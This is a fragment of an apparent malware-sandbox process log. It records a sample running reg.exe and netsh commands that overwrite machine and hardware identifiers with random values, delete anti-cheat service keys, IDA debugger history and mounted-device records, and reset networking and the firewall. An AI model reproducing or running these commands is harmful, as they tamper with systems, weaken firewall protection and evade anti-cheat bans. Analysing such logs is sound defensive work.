  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste24231-29336-16599-334317400} /f
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:5296
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 24231 /f
      4⤵
      PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:5420
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 24231 /f
      4⤵
      Modifies registry key
      PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:5340
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 24231 /f
      4⤵
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:5332
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 24231-29336-16599-3343 /f
      4⤵
      PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:5812
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste24231-29336-16599-3343 /f
      4⤵
      PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:5828
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste24231-29336-16599-3343 /f
      4⤵
      Modifies registry key
      PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste%random% /f
    3⤵
    PID:5832
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste24231 /f
      4⤵
      Modifies registry key
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:5392
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 24231 /f
      4⤵
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:5124
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 24234 /f
      4⤵
      PID:5280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste%random%-%random%-%random%-%random%} /f
    3⤵
    PID:5204
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste24234-7317-1696-27407} /f
      4⤵
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:1904
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:5548
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 24234-7317-1696-2740727714 /f
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:5632
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:5644
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:5664
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:5880
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:5484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:5952
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:5924
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:6044
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:5252
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:5204
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:5704
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5584
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-24234-7317-169627407 /f
      4⤵
      PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5424
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-24234-7317-169627407 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5932
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-24234-7317-169627407 /f
      4⤵
      PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:5828
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5740
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:6128
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:6044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4140
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:5276
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:5272
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:5516
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:5588
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:5568
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:5628
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      PID:5872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6004
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 242371806519560187025261271173496526720589302762227225270 /f
      4⤵
      Modifies registry class
      PID:6020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5288
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:6128
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      Modifies registry key
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1028
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      Modifies registry key
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:5904
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      Modifies registry key
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4992
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5368
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-24237-18065-1956018702 /f
      4⤵
      PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:5856
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:5140
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:6004
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:5916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:5968
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:4532
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:5728
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      Modifies registry key
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:4140
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5504
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 2424128814465699971557531043660923394332241272212425314 /f
      4⤵
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5276
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 24241288144656999715575310436609233943322412722124 /f
      4⤵
      Modifies registry class
      PID:5784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2348
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 242412881446569997155753104366092339433224127 /f
      4⤵
      Modifies registry key
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5860
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 2424128814465699971557531043660923394332241272212425314 /f
      4⤵
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5924
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 2424128814465699971557531043660923394332241272212425314 /f
      4⤵
      Modifies registry key
      PID:5488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6004
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2424128814465699971557531043660923394332 /f
      4⤵
      Modifies Internet Explorer settings
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2424128814465699971557531043660923394332 /f
      4⤵
      PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5264
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2424128814465699971557531043660923394332 /f
      4⤵
      PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:832
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 24241288144656 /f
      4⤵
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5512
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 24241288144656 /f
      4⤵
      Modifies registry key
      PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:4140
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 24241288144656 /f
      4⤵
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:3964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 24241288144656 /f
      4⤵
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5488
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 2424128814465699971557531043660923394332241272212425314 /f
      4⤵
      PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5384
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {24244-6794-225201293} /f
      4⤵
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:1588
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:5420
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:5612
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:5516
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset catalog
    3⤵
    PID:3008
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset catalog
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:272
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:5932
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall reset
      4⤵
